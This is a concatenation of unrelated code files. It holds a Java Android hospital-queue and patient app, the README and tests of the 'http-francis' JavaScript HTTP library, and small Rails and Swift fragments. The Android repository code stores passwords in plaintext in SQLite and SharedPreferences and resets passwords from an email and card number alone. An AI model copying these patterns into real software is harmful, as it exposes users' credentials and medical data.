db=connector.getWritableDatabase();
}
public synchronized static UserRepository getInstance(Context context) {
if (userRepository == null) {
userRepository = new UserRepository(context);
}
return userRepository;
}
public boolean checkUser(User user){
if(user!=null) {
Cursor cursor = db.rawQuery("SELECT * FROM user WHERE eml=?", new String[]{user.getEml()});
if (cursor.getCount() > 0) {
cursor.close();
return true;
}
}
return false;
}
public int addUser(User user){
if(user!=null){
Cursor cursor=db.rawQuery("SELECT * FROM user WHERE eml=?",new String[]{user.getEml()});
if (cursor.getCount()>0){
cursor.close();
return -1;
}else{
cursor.close();
try{
db.execSQL("INSERT INTO user(card,eml,psw,phone) values(?,?,?,?)",user.getAll());
return 1;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return 0;
}
}
}else{
return 0;
}
}
public int isValid(User user){
Cursor cursor1 = db.rawQuery("SELECT * FROM user WHERE eml=?",new String[]{user.getEml()});
if(cursor1.getCount()>0){
cursor1.close();
Cursor cursor2 = db.rawQuery("SELECT * FROM user WHERE eml=? AND psw=?",new String[]{user.getEml(),user.getPsw()});
if(cursor2.getCount()>0){
cursor2.close();
return 1;
}else{
cursor2.close();
return 0;
}
}else{
cursor1.close();
return -1;
}
}
public boolean updateUserInfo(User user){
try{
db.execSQL("UPDATE user SET card=?,phone=? WHERE eml=?",
new String[]{user.getCard(),user.getPhone(),user.getEml()});
return true;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return false;
}
}
public boolean updateUserPsw(User user,String newPsw){
try{
db.execSQL("UPDATE user SET psw=? WHERE eml=? AND psw=?",new String[]{newPsw,user.getEml(),user.getPsw()});
return true;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return false;
}
}
public int resetUserPsw(User user){
Cursor cursor =db.rawQuery("SELECT * FROM user WHERE eml=? AND card=?",new String[]{user.getEml(),user.getCard()});
if(cursor.getCount()>0){
cursor.close();
try{
db.execSQL("UPDATE user SET psw=? WHERE eml=?",new String[]{user.getPsw(),user.getEml()});
return 1;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return 0;
}
}else{
return -1;
}
}
public boolean deleteUser(User user){
try{
db.execSQL("DELETE FROM user WHERE eml=? AND psw=?",new String[]{user.getEml(),user.getPsw()});
return true;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return false;
}
}
public User getUser(String eml){
Cursor cursor =db.rawQuery("SELECT * FROM user WHERE eml=?",new String[]{eml});
if(cursor.getCount()>0){
cursor.moveToFirst();
return new User(cursor.getInt(0),cursor.getString(1),cursor.getString(2),cursor.getString(3),cursor.getString(4));
}else{
cursor.close();
return null;
}
}
}
<file_sep>/app/src/main/java/com/patient/Main2Activity.java
package com.patient;
import android.content.*;
import android.net.Uri;
import android.os.Bundle;
import android.os.Environment;
import android.os.Handler;
import android.support.v4.view.ViewPager;
import android.util.Log;
import android.view.*;
import android.support.design.widget.NavigationView;
import android.support.v4.view.GravityCompat;
import android.support.v4.widget.DrawerLayout;
import android.support.v7.app.ActionBarDrawerToggle;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.app.AlertDialog;
import android.support.v7.widget.Toolbar;
import android.widget.*;
import com.patient.framework.repository.PatientRepository;
import com.patient.framework.utils.SaveDrawable;
import com.patient.framework.utils.Smoother;
import java.io.File;
public class Main2Activity extends AppCompatActivity
implements NavigationView.OnNavigationItemSelectedListener,View.OnClickListener,
CompoundButton.OnCheckedChangeListener {
private long exitTime=0L;
private DrawerLayout drawer;
private ViewPager mViewPager;
private CardPagerAdapter mCardAdapter;
private ShadowTransformer mCardShadowTransformer;
private NavigationView navigationView;
private TextView mNameTextView,mEmlTextView;
private ImageView mImageView;
private PatientRepository patientRepository;
private static Context context;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main2);
context=Main2Activity.this;
patientRepository=new PatientRepository(Main2Activity.this);
String eml=getSharedPreferences("current",MODE_PRIVATE).getString("eml","");
String card=getSharedPreferences("current",MODE_PRIVATE).getString("card","");
int imageSource=getSharedPreferences("current",MODE_PRIVATE).getInt("avatar",R.drawable.user_young);
String name=patientRepository.getPatient(card).getName();
navigationView=(NavigationView)findViewById(R.id.nav_view);
View headerView=navigationView.getHeaderView(0);
mImageView=(ImageView)headerView.findViewById(R.id.imageView);
mImageView.setImageResource(imageSource);
mImageView.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
startActivity(new Intent(Main2Activity.this,ProfileActivity.class));
}
});
mNameTextView=(TextView)headerView.findViewById(R.id.name_drawer);
mEmlTextView=(TextView)headerView.findViewById(R.id.eml_drawer);
mNameTextView.setText(name);
mEmlTextView.setText(eml);
navigationView.setNavigationItemSelectedListener(this);
Toolbar toolbar=(Toolbar) findViewById(R.id.toolbar);
setSupportActionBar(toolbar);
mViewPager=(ViewPager) findViewById(R.id.viewPager);
mCardAdapter=new CardPagerAdapter();
mCardAdapter.addCardItem(
new CardItem(R.string.title_1, R.string.text_1,"card_btn_reg",R.id.card_view_1));
mCardAdapter.addCardItem(
new CardItem(R.string.title_2, R.string.text_2,"card_btn_pro",R.id.card_view_2));
mCardAdapter.addCardItem(
new CardItem(R.string.title_3, R.string.text_3,"card_btn_sign",R.id.card_view_3));
mCardShadowTransformer=new ShadowTransformer(mViewPager, mCardAdapter);
mViewPager.setAdapter(mCardAdapter);
mViewPager.setPageTransformer(false, mCardShadowTransformer);
mViewPager.setOffscreenPageLimit(3);
drawer=(DrawerLayout) findViewById(R.id.drawer_layout);
ActionBarDrawerToggle toggle = new ActionBarDrawerToggle(
this,drawer,toolbar,R.string.navigation_drawer_open,R.string.navigation_drawer_close);
drawer.setDrawerListener(toggle);
toggle.syncState();
}
@Override
public void onClick(View view) {
String clicked=view.getTag().toString();
Log.d("clicked",clicked);
if("card_btn_1".equals(clicked)){
}else if("card_btn_2".equals(clicked)){
startActivity(new Intent(Main2Activity.this,ProfileActivity.class));
}else if("card_btn_3".equals(clicked)){
}
}
@Override
public void onCheckedChanged(CompoundButton compoundButton, boolean b) {
}
@Override
public void onBackPressed() {
if (drawer.isDrawerOpen(GravityCompat.START)) {
drawer.closeDrawer(GravityCompat.START);
} else {
if((System.currentTimeMillis()-exitTime) > 2000){
Toast.makeText(getApplicationContext(), "再按一次退出应用", Toast.LENGTH_SHORT).show();
exitTime = System.currentTimeMillis();
} else {
finish();
System.exit(0);
}
}
}
@Override
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.main2, menu);
return true;
}
@Override
public boolean onOptionsItemSelected(MenuItem item) {
int id = item.getItemId();
if (id == R.id.action_settings) {
startActivity(new Intent(Main2Activity.this,SettingsActivity.class));
return true;
}else if(id == R.id.action_quit) {
new AlertDialog.Builder(Main2Activity.this).setTitle("提示")
.setMessage("真的要退出当前用户吗?")
.setPositiveButton("确定", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
invalidate();
startActivity(new Intent(Main2Activity.this,LoginActivity.class));
finish();
}
}).setNegativeButton("返回", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
}
}).show();
}
return super.onOptionsItemSelected(item);
}
@Override
public boolean onNavigationItemSelected(MenuItem item) {
int id = item.getItemId();
drawer.closeDrawer(GravityCompat.START);
// if (id == R.id.nav_index) {
//
// } else
if (id == R.id.nav_act){
Smoother.startActivity(Main2Activity.this,MainActivity.class);
} else if (id == R.id.nav_act1) {
Smoother.startActivity(Main2Activity.this,RegisterActivity.class);
} else if (id == R.id.nav_act2) {
Smoother.startActivity(Main2Activity.this,ProfileActivity.class);
} else if (id == R.id.nav_act3) {
Smoother.startActivity(Main2Activity.this,PatinetSignActivity.class);
} else if (id == R.id.nav_share) {
attemptShare();
} else if (id == R.id.nav_send) {
Smoother.startActivity(Main2Activity.this,ScrollingActivity.class);
} else if (id == R.id.nav_quit) {
new AlertDialog.Builder(Main2Activity.this).setTitle("提示")
.setMessage("真的要退出吗?")
.setPositiveButton("确定", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
invalidate();
finish();
Smoother.startActivity(Main2Activity.this,LoginActivity.class);
}
}).setNegativeButton("返回", null).show();
} else if (id == R.id.nav_setting){
Smoother.startActivity(Main2Activity.this,SettingsActivity.class);
}
return true;
}
private void attemptShare(){
Intent intent = new Intent();
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
ComponentName comp = new ComponentName("com.tencent.mm",
"com.tencent.mm.ui.tools.ShareToTimeLineUI");
intent.setComponent(comp);
intent.setAction(Intent.ACTION_SEND);
intent.setType("image/*");
SaveDrawable.saveDrawableById(getResources(),R.drawable.share,
Environment.getExternalStorageDirectory()+"/download/share.jpg");
Uri imgUri;
// Resources res = this.getResources();
// imgUri = Uri.parse(ContentResolver.SCHEME_ANDROID_RESOURCE + "://"
// + res.getResourcePackageName(R.drawable.share) + "/"
// + res.getResourceTypeName(R.drawable.share) + "/"
// + res.getResourceEntryName(R.drawable.share));
imgUri=Uri.fromFile(new File(Environment.getExternalStorageDirectory()+"/download/share.jpg"));
intent.putExtra("Kdescription", "Hey,我正在试用健康不用等app。在线就能轻松挂号,看病快人一步!自从用上它才知道什么叫做相见恨晚,你也来试试吧!");
intent.putExtra(Intent.EXTRA_STREAM, imgUri);
startActivity(intent);
}
public static void conduct(String keyword){
if(keyword.equals("reg")){
context.startActivity(new Intent(context,RegisterActivity.class));
}else if(keyword.equals("pro")){
context.startActivity(new Intent(context,ProfileActivity.class));
}else if(keyword.equals("sign")){
context.startActivity(new Intent(context,PatinetSignActivity.class));
}
}
private void invalidate(){
SharedPreferences.Editor editor
=getSharedPreferences("current",MODE_PRIVATE).edit();
editor.putBoolean("valid",false);
editor.putBoolean("reg",false);
editor.putBoolean("queue",false);
editor.putInt("qtime",-1);
editor.putInt("before",0);
editor.putString("name","");
editor.putString("card","");
editor.putString("eml","");
editor.putString("psw","");
editor.putString("pid","");
editor.commit();
}
}
<file_sep>/app/src/main/java/com/patient/framework/service/UserServices.java
package com.patient.framework.service;
import android.content.Context;
import com.patient.framework.model.User;
import com.patient.framework.repository.UserRepository;
public class UserServices {
private UserRepository userRepository;
public UserServices(Context context) {
userRepository=new UserRepository(context);
}
public String register(User user){
int result=userRepository.addUser(user);
switch(result){
case 1: return "注册成功!即将返回首页登录...";
case 0: return "注册失败,请您稍后再次尝试";
case -1: return "注册失败,用户已存在";
default: return "后台出现未知错误";
}
}
public String login(User user){
int result=userRepository.isValid(user);
switch(result) {
case 1:
return "登录成功";
case 0:
return "登录失败,邮箱或密码错误";
case -1:
return "用户不存在";
default:
return "登录失败,邮箱或密码错误";
}
}
public String update(User user){
if(userRepository.updateUserInfo(user)){
return "已更新";
}else{
return "更新失败";
}
}
public String resetPsw(User user){
int result=userRepository.resetUserPsw(user);
switch(result){
case 1: return "密码重置成功!即将返回首页登录...";
case 0: return "后台出现未知错误";
case -1: return "密码重置失败,填写信息与用户信息不一致";
default: return "后台出现未知错误";
}
}
public String changePsw(User user,String newPsw){
if(userRepository.updateUserPsw(user,newPsw)){
return "密码修改成功";
}else{
return "密码修改失败";
}
}
public String resign(User user){
if(userRepository.deleteUser(user)){
return "注销成功";
}else{
return "注销失败";
}
}
}
<file_sep>/app/src/main/java/com/patient/framework/model/PatientSign.java
package com.patient.framework.model;
public class PatientSign {
int sid;
int pid;
float height;
float weight;
float temp;
float breath;
float pulse;
float blsugar;
String pressure;
String more;
public PatientSign() {
}
public PatientSign(int pid,float height, float weight, float temp, float breath, float pulse, String pressure, float blsugar, String more) {
this.pid = pid;
this.height = height;
this.weight = weight;
this.temp = temp;
this.breath = breath;
this.pulse = pulse;
this.pressure = pressure;
this.blsugar = blsugar;
this.more = more;
}
public PatientSign(int sid, int pid, float height, float weight, float temp, float breath, float pulse, String pressure, float blsugar, String more) {
this.sid = sid;
this.pid = pid;
this.height = height;
this.weight = weight;
this.temp = temp;
this.breath = breath;
this.pulse = pulse;
this.pressure = pressure;
this.blsugar = blsugar;
this.more = more;
}
public int getId() {
return sid;
}
public void setId(int sid) {
this.sid = sid;
}
public int getPid() {
return pid;
}
public void setPid(int pid) {
this.pid = pid;
}
public float getHeight() {
return height;
}
public void setHeight(float height) {
this.height = height;
}
public float getWeight() {
return weight;
}
public void setWeight(float weight) {
this.weight = weight;
}
public float getTemp() {
return temp;
}
public void setTemp(float temp) {
this.temp = temp;
}
public float getBreath() {
return breath;
}
public void setBreath(float breath) {
this.breath = breath;
}
public float getPulse() {
return pulse;
}
public void setPulse(float pulse) {
this.pulse = pulse;
}
public String getPressure() {
return pressure;
}
public void setPressure(String pressure) {
this.pressure = pressure;
}
public float getBlsugar() {
return blsugar;
}
public void setBlsugar(float blsugar) {
this.blsugar = blsugar;
}
public String getMore() {
return more;
}
public void setMore(String more) {
this.more = more;
}
@Override
public String toString() {
return "PatientSign{" +
"sid=" + sid +
", pid=" + pid +
", height=" + height +
", weight=" + weight +
", temp=" + temp +
", breath=" + breath +
", pulse=" + pulse +
", pressure=" + pressure +
", blsugar=" + blsugar +
", more='" + more + '\'' +
'}';
}
public String[] getAll(){
return new String[]{Integer.toString(pid),Float.toString(height),Float.toString(weight),Float.toString(temp),Float.toString(breath),Float.toString(pulse),pressure,Float.toString(blsugar),more};
}
public String[] getInfo(){
return new String[]{Integer.toString(sid),Integer.toString(pid),Float.toString(height),Float.toString(weight),Float.toString(temp),Float.toString(breath),Float.toString(pulse),pressure,Float.toString(blsugar),more};
}
}
<file_sep>/app/src/main/java/com/patient/framework/repository/QueueRepository.java
package com.patient.framework.repository;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.util.Log;
import com.patient.framework.model.Queue;
import com.patient.framework.service.DBConnector;
import java.text.SimpleDateFormat;
import java.util.Date;
public class QueueRepository {
private static QueueRepository queueRepository;
private SQLiteDatabase db;
public QueueRepository(Context context){
DBConnector connector=new DBConnector(context);
db=connector.getWritableDatabase();
}
public synchronized static QueueRepository getInstance(Context context) {
if (queueRepository == null) {
queueRepository = new QueueRepository(context);
}
return queueRepository;
}
public int onQueue(Queue queue){
if(queue!=null){
try {
Cursor cursor=db.rawQuery("SELECT * FROM queue WHERE qid=?",
new String[]{Integer.toString(queue.getQId())});
if (cursor.getCount()>0){
cursor.close();
return -1;
}else{
cursor.close();
try{
db.execSQL("INSERT INTO queue(pid,deid,rid,drid,start,stayed) values(?,?,?,?,?,?)",
new Object[]{queue.getpId(),queue.getDeId(),queue.getrId(),queue.getDrId(),
queue.getStartTime(),queue.getStayed()});
return 1;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
}
}
}catch (Exception e){
e.printStackTrace();
db.execSQL("CREATE TABLE IF NOT EXISTS queue(qid integer primary key autoincrement,pid integer,deid integer,rid integer,drid integer,timestamp date,start double,end double,stayed integer)");
}
}
return 0;
}
public boolean offQueue(Queue queue){
try{
db.execSQL("UPDATE queue SET stayed=?,end=? WHERE qid=?",
new Object[]{queue.getStayed(),queue.getEndTime(),queue.getQId()});
return true;
}catch (Exception e) {
Log.d("错误", e.getMessage().toString());
return false;
}
}
public Queue getQueue(int pid,int stayed){
try {
Cursor cursor =db.rawQuery("SELECT * FROM queue WHERE pid=? AND stayed=?",
new String[]{Integer.toString(pid),Integer.toString(stayed)});
if(cursor.getCount()>0){
try {
cursor.moveToFirst();
SimpleDateFormat dateFormat=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
String timeStamp=cursor.getString(5);
if(timeStamp==null||"".equals(timeStamp)){
timeStamp=dateFormat.format(new Date());
}
return new Queue(cursor.getInt(0),cursor.getInt(1),
cursor.getInt(2),cursor.getInt(3),
cursor.getInt(4),dateFormat.parse(timeStamp),
cursor.getDouble(6),cursor.getDouble(7),
cursor.getInt(8));
}catch(Exception e){
e.printStackTrace();
return null;
}
}else{
cursor.close();
return null;
}
}catch (Exception e){
db.execSQL("CREATE TABLE IF NOT EXISTS queue(qid integer primary key autoincrement,pid integer,deid integer,rid integer,drid integer,timestamp date,start double,end double,stayed integer)");
e.printStackTrace();
}
return null;
}
public int getBefore(int qid){
Cursor cursor =db.rawQuery("SELECT COUNT(*) count FROM queue WHERE stayed=1 AND qid<? ORDER BY start",new String[]{Integer.toString(qid)});
if(cursor.getCount()>0) {
cursor.moveToFirst();
return cursor.getInt(0);
}else{
return 0;
}
}
public int getAfter(int qid){
Cursor cursor =db.rawQuery("SELECT COUNT(*) count FROM queue WHERE stayed=1 AND qid>? ORDER BY start",new String[]{Integer.toString(qid)});
if(cursor.getCount()>0) {
cursor.moveToFirst();
return cursor.getInt(0);
}else{
return 0;
}
}
}
| bb799b4399496d9ebfd7c846ca2a5261797d6eb0 | [
"Java"
] | 8 | Java | relwalter/Patient | 234867d3d9151c9ee75b4bb4edc31fd2a03674e3 | 6fd83d56f463d475c603d821e1ce7f6dbec7b1cd |
refs/heads/master | <repo_name>Nova-Wintermute/Nova-Wintermute<file_sep>/OIPA/.bashrc
export WORKON_HOME=/home/matthijs/.virtualenvs
<file_sep>/rails-yelp-mvp/db/seeds.rb
# This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rake db:seed (or created alongside the db with db:setup).
#
# Examples:
#
# cities = City.create([{ name: 'Chicago' }, { name: 'Copenhagen' }])
# Mayor.create(name: 'Emanuel', city: cities.first)
# category: { chinese: 0, italian: 1, japanese: 2, french: 3, belgian: 4}
Restaurant.destroy_all
restaurants_attributes = [
{
name: "<NAME>",
address: "112 rue du Fg St-Honoré 75008 Paris",
phone_number: "0601232151",
category: 3
},
{
name: "<NAME>",
address: "4 rue Blainville 75005 Paris",
phone_number: "2123101723",
category: 4
},
{
name: "<NAME>",
address: "route de Suresnes 75016 Paris",
phone_number: "624522454",
category: 1
},
{
name: "<NAME>",
address: "3straat, Den Haag",
phone_number: "62455633422454",
category: 2
},
{
name: "<NAME>",
address: "Rue David Mitchell, Neo-Seoul",
phone_number: "52013578",
category: 0
},
{
name: "Caesar",
address: "Imperial Avenue",
phone_number: "624345555555",
category: 1
}
]
restaurants_attributes.each { |params| Restaurant.create!(params) }
<file_sep>/rails-yelp-mvp/app/models/review.rb
class Review < ActiveRecord::Base
belongs_to :restaurant
validates :rating, :content, :restaurant, presence: true
validates :rating, numericality: { only_integer: true }
validates :rating, numericality: { greater_than_or_equal_to: 0, less_than_or_equal_to: 5 }
end
<file_sep>/rails-yelp-mvp/app/models/restaurant.rb
class Restaurant < ActiveRecord::Base
has_many :reviews, dependent: :destroy
enum category: { chinese: 0, italian: 1, japanese: 2, french: 3, belgian: 4}
validates :name, :address, :category, presence: true
# validates_inclusion_of :category in: Restaurant.categories.keys
end
| 701f3736f7dc01b6dc88d73d7b2bcd7642e93d20 | [
"Ruby",
"Shell"
] | 4 | Shell | Nova-Wintermute/Nova-Wintermute | 2e7ee1b20985ebbce7f6a2723512c7e4882bd0b8 | fa206c51b785155c8115130091f2f7214e6ec5f6 |
refs/heads/master | <file_sep>import { Http } from '../main';
import 'jasmine-ajax';
describe('Request class tests', function(){
var JSONP_URL = 'http://resources2.buongiorno.com/lapis/apps/categories.getList?real_customer_id=xx_gameasy&id=&lang=en&formats=html5applications&sort=&size=5&offset=0&white_label=xx_gameasy&main_domain=http://www2.gameasy.com/ww-it/&fw=gameasy&vh=ww.gameasy.com&sort=meta.en.name';
beforeEach(function() {
jasmine.Ajax.install();
});
afterEach(function() {
jasmine.Ajax.uninstall();
});
it('200 GET JSON as response', function(done){
var url = '/get/json';
var mySuccessSpy = jasmine.createSpy('success');
jasmine.Ajax.stubRequest(url).andReturn({
'response': { data: 'aa' },
'status': 200,
'contentType': 'text/json'
});
// make the request
var theRequest = new Http({
method: 'get',
url: url,
responseType: 'json'
});
theRequest.promise.then(mySuccessSpy)
.then(function(){
expect(mySuccessSpy).toHaveBeenCalledWith([{ data: 'aa' }, 200, theRequest.calls[theRequest.calls.length - 1]]);
done();
});
});
it('404 GET JSON as response with two attempts', function(done){
var url = '/get/json';
var mySuccessSpy = jasmine.createSpy('success');
jasmine.Ajax.stubRequest(url).andReturn({
'response': { error: true },
'status': 404,
'statusText': 'HTTP/1.1 404 NOT FOUND',
'contentType': 'application/json'
});
// make the request
var theRequest = new Http({
method: 'get',
url: url,
responseType: 'json',
attempt: 2,
retryAfter: 100
});
/* theRequest.calls[theRequest.calls.length - 1].responseType = "json";*/
var success = jasmine.createSpy('success');
var error = jasmine.createSpy('error');
theRequest.promise.then(success)
.catch(error).then(function(){
expect(theRequest.options.attempt).toEqual(0);
expect(theRequest.calls.length).toEqual(2);
expect(error).toHaveBeenCalledWith({ status: 404, statusText: '' });
expect(success).not.toHaveBeenCalled();
done();
});
});
it('200 GET HTML as response', function(done){
var url = '/get/html';
var mySuccessSpy = jasmine.createSpy('success');
var xmlAsString = (new XMLSerializer).serializeToString(document);
// var xmlDoc = (new window.DOMParser()).parseFromString(xmlAsString, 'text/xml');
jasmine.Ajax.stubRequest(url).andReturn({
'responseXML': window.document,
'status': 200,
'statusText': 'OK',
'contentType': 'text/xml;charset=UTF-8'
});
var success = jasmine.createSpy('success');
var error = jasmine.createSpy('error');
var progress = jasmine.createSpy('progress');
// Make the request
var theRequest = new Http({
method: 'get',
url: url,
responseType: 'document',
onProgress: progress
});
theRequest.promise.then(function(result){
success(result);
expect(success).toHaveBeenCalled();
expect(progress).toHaveBeenCalled();
expect(progress).toHaveBeenCalledWith(NaN);
expect(error).not.toHaveBeenCalled();
// trust me. it works!
// expect(result[0].documentElement).toBeDefined();
// OTHERS CHECKS?
done();
}).catch(error);
});
it('200 GET TEXT as response', function(done){
var url = '/get/text';
var mySuccessSpy = jasmine.createSpy('success');
jasmine.Ajax.stubRequest(url).andReturn({
'responseText': 'Testo!',
'status': 200,
'statusText': 'OK',
'contentType': 'text/plain;charset=UTF-8'
});
// Make the request
var theRequest = new Http({
method: 'get',
url: url,
responseType: 'text'
});
theRequest.promise.then(function(result){
expect(result[0]).toEqual('Testo!');
done();
});
});
it('200 POST a json object', function(done){
var url = '/post/echo';
var data = { some: 'data' };
jasmine.Ajax.stubRequest(url).andReturn({
'response': JSON.stringify(data),
'status': 200,
'statusText': 'OK',
'contentType': 'application/json;charset=UTF-8'
});
// Make the request
var theRequest = new Http({
method: 'POST',
url: url,
responseType: 'json',
data
});
theRequest.promise.then(function(result){
expect(JSON.parse(result[0])).toEqual(data);
done();
}).catch(function(reason){
console.log(reason);
});
});
it('200 PUT ', function(done){
var url = '/put/echo';
var data = { aa: 'bb' };
jasmine.Ajax.stubRequest(url).andReturn({
'response': JSON.stringify(data),
'status': 200,
'statusText': 'OK',
'contentType': 'application/json;charset=UTF-8'
});
// PUT
var putTask = new Http({
method: 'PUT',
url: url,
dataType: 'json',
data
});
putTask.promise.then(function(results){
var obj = JSON.parse(results[0]);
expect(obj).toEqual({ aa: 'bb' });
done();
}).catch(function(){
done();
});
});
it('200 DELETE ', function(done){
var url = '/delete/echo';
var data = { aa: 'bb' };
jasmine.Ajax.stubRequest(url).andReturn({
'response': JSON.stringify(data),
'status': 200,
'statusText': 'OK',
'contentType': 'application/json;charset=UTF-8'
});
// DELETE
var deleteTask = new Http({
method: 'DELETE',
url: url,
dataType: 'json',
data: { aa: 'bb' }
});
deleteTask.promise.then(function(results){
var obj = JSON.parse(results[0]);
expect(obj).toEqual({ aa: 'bb' });
done();
}).catch(function(){
done();
});
});
it('JSONP with Http module', (done) => {
var r = new Http({
method: 'JSONP',
url: JSONP_URL
});
r.promise.then((response) => {
expect(response).toBeDefined();
expect(r.calls.length).toEqual(1);
done();
}).catch((reason) => {
console.log(r.calls);
done();
});
});
it('JSONP fail with Http module', (done) => {
var r = new Http({
method: 'JSONP',
url: '',
timeout: 1000
});
var mySuccessSpy = jasmine.createSpy('success');
r.promise.then(mySuccessSpy).catch((reason) => {
expect(reason).toBeDefined();
var call = r.calls[r.calls.length - 1];
expect(r.calls.length).toEqual(1);
expect(mySuccessSpy).not.toHaveBeenCalled();
done();
});
});
});<file_sep># http-francis
## [!!!] This repository has been deprecated, we suggest to use [https://github.com/docomodigital/js-fetcher](https://github.com/docomodigital/js-fetcher) instead
[](https://travis-ci.org/D-Mobilelab/http-francis)
[](https://coveralls.io/github/D-Mobilelab/http-francis?branch=master)
[](https://badge.fury.io/js/http-francis)
[](https://badge.fury.io/bo/http-francis)
[](https://badge.fury.io/gh/D-Mobilelab%http-francis)
- retry
- attempts
- promise based
### Commands
- npm run build
- npm run test
- npm run test:watch // run tests while typing
- npm run documentation // generate docs folder with .html, append docs to the readme.md
### Release a new version
- npm version patch|minor|major
This will generate the docs/<version> and dist/
# API
## Francis#Http
## constructor
an http class to make requests over the net with retry and interval between them
**Parameters**
- `requestParams` **[object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object)** object where you can specify the options of the request
- `requestParams.type` **\[[string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** the type of the request: possible values POST, GET, PUT, DELETE and JSONP (optional, default `GET`)
- `requestParams.url` **[string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)** the url to request for
- `requestParams.headers` **\[[object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object)]** the headers object (optional, default `{}`)
- `requestParams.timeout` **\[[string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** the timeout of the request in ms (optional, default `2000`)
- `requestParams.attempt` **\[[string](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** attempts. if it fails for some reason retry (optional, default `1`)
- `requestParams.retryAfter` **\[[number](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number)]** the interval between requests in ms: 500 for example (optional, default `0`)
- `requestParams.async` **\[[boolean](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Boolean)]** the request could be synchrounous, default async (optional, default `true`)
- `options`
- `callback` **\[[function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/function)]** onend callback (optional, default `function(){}`)
**Examples**
```javascript
<pre>
npm install --save http-francis
import { Http, getImageRaw, JSONPRequest } from 'http-francis';
OR
var Http = require("http-francis").Http;
OR
<script src='http-francis.js'></script>
// in global case window['http-francis'].Http
var getTask = new Http({
method: "GET",
url: "https://someimageurl/image.png",
responseType: "blob",
mimeType: "image/png",
onProgress:(percentage)=>{
// there must be Content-Length header in the response to get the right percentage
// otherwise percentage is a NaN
}
});
getTask.promise.then((response) => {
var imgTag = document.createElement("img");
imgTag.src = response[0];
document.body.appendChild(imgTag);
});
</pre>
```
## parseResponse
parseResponse
**Parameters**
- `xhr` **[XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest)** parse
Returns **[array](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array)** [responseData, statusCode, xhr]
## getImageRaw
getImageRaw from a specific url
**Parameters**
- `options` **[Object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object)** the options object
- `options.url` **[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)** http or whatever
- `options.responseType` **\[[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** possible values arraybuffer|blob (optional, default `"blob"`)
- `options.mimeType` **\[[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)]** possible values "image/png"|"image/jpeg" used only if "blob" is set as responseType (optional, default `"image/jpeg"`)
- `_onProgress` **\[[Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/function)]** (optional, default `function(){}`)
Returns **[Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise)<([Blob](https://developer.mozilla.org/en-US/docs/Web/API/Blob) \| [ArrayBuffer](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/ArrayBuffer) \| [Error](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Error))>**
## JSONPRequest
Make a jsonp request, remember only GET
The function create a tag script and append a callback param in querystring.
The promise will be reject after 3s if the url fail to respond
**Parameters**
- `url` **[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)** the url with querystring but without &callback at the end or &function
- `timeout` **\[[Number](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number)](default 3000)** ms range for the response
**Examples**
```javascript
<pre>
request = new JSONPRequest("http://www.someapi.com/asd?somequery=1");
request.then((data) => {});
</pre>
```
Returns **[Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise)<([Object](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object) \| [String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String))>**
## getJSON
getJSON
**Parameters**
- `url` **[String](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String)** for example <http://jsonplaceholder.typicode.com/comments?postId=1>
Returns **[Promise](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise)** the string error is the statuscode
## Francis
an http module to make requests over the net with retry and interval between them
| c0defa4540f69c97c645a7d1926d85222c521e80 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | D-Mobilelab/http-francis | bb303b4aaad810014939d1fd237982a4dcceed4c | 4025a89244c4cdfe96e42dcf6b79c4170c4cee01 |
refs/heads/master | <file_sep>//
// ViewController.swift
// drawing
//
// Created by <NAME> on 7/6/17.
// Copyright © 2017 GT. All rights reserved.
//
import UIKit
